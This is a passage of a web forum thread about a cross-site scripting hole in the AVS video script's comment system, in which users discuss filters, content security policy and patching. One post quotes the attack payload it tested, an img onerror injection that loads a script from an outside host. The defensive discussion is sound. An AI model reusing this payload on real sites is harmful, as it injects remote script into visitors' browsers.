Jump to content


Photo
* * * - - 2 votes

Attention hackers and comments!!!!!


  • Please log in to reply
27 replies to this topic

#21 Damien

Damien

    Junior Member

  • Members
  • PipPipPip
  • 81 posts

Posted 24 July 2016 - 01:47 AM

avs admin imagine that will upgrade, for other people who have no solution.

 

What solution? I only see a joke as far as support goes. I doubt the guy who owns this script can even write hello world in PHP.


Edited by Damien, 24 July 2016 - 01:53 AM.


#22 apple82

apple82

    Member

  • Members
  • PipPipPipPip
  • 300 posts
  • LocationSpain

Posted 24 July 2016 - 06:25 AM

What solution? I only see a joke as far as support goes. I doubt the guy who owns this script can even write hello world in PHP.

 

Yes, send email suport avs.



#23 Damien

Damien

    Junior Member

  • Members
  • PipPipPip
  • 81 posts

Posted 29 July 2016 - 07:08 AM

Yes, send email suport avs.

 

We don't have this problem, we've solved it with a filter. Also anyone using niginx can set a content security policy anyway, his .js script wont work then. https://content-security-policy.com/

 

My other point is no-one should need ask for help with this, it's a hole in the comments system that should be patched and updated, it's letting him run a .js file it's an exploit imo.


Edited by Damien, 29 July 2016 - 07:10 AM.


#24 theone

theone

    Senior Member

  • Members
  • PipPipPipPip
  • 371 posts

Posted 22 November 2016 - 01:39 AM

I'm assuming this was patched in AVS 4 but if anyone has not fixed this I have a mod that will detect the malicious code and prevent the comment from posting, immediately ban the user, and provide you with a range of information about the malicious person including computer / browser specs, ip, geo location, etc.



#25 Yikmings

Yikmings

    Junior Member

  • Members
  • PipPip
  • 22 posts

Posted 24 November 2016 - 10:47 AM

I fix it by disable and clean all comments in sql.



#26 brianatthebeach

brianatthebeach

    Member

  • Members
  • PipPipPip
  • 107 posts

Posted 24 July 2017 - 05:53 AM

Anyone know if this is fixed?  I am currently on avs 3.3.  When I put in comment 

<img src=virink onerror=s=createElement('script');body.appendChild(s);s.src='http://www.besissy.com/h.js';><img src = etc etc
mg src=virink onerror=s=createElement('script');body.appendChild(s);s.src='http://www.besissy.com/h.js';>mg src = etc etc

left angle bracket and i <i is removed from from each occurrence in the comment

 

Does this indicate I have a fix applied with 3.3?

 

Thanks,

Brian



#27 brianatthebeach

brianatthebeach

    Member

  • Members
  • PipPipPip
  • 107 posts

Posted 10 August 2017 - 09:59 PM

Hi,
 
I have a lot of mods in 3.3.  I'm won't be ready to go to 4.0 for a while and comments have been off for over a year now.  I see the new filter.class.php is only different in that it uses xss_filter and dependencies in htmlpurifier.
 
Can I simply upload htmlpurifier to classes and replace filter.class.php to get the comments protection?  It looks like it might work.
 
Thanks,
brian


#28 apple82

apple82

    Member

  • Members
  • PipPipPipPip
  • 300 posts
  • LocationSpain

Posted 11 August 2017 - 07:10 AM

 

Hi,
 
I have a lot of mods in 3.3.  I'm won't be ready to go to 4.0 for a while and comments have been off for over a year now.  I see the new filter.class.php is only different in that it uses xss_filter and dependencies in htmlpurifier.
 
Can I simply upload htmlpurifier to classes and replace filter.class.php to get the comments protection?  It looks like it might work.
 
Thanks,
brian

 

Of course, files to repair the problem can always be added.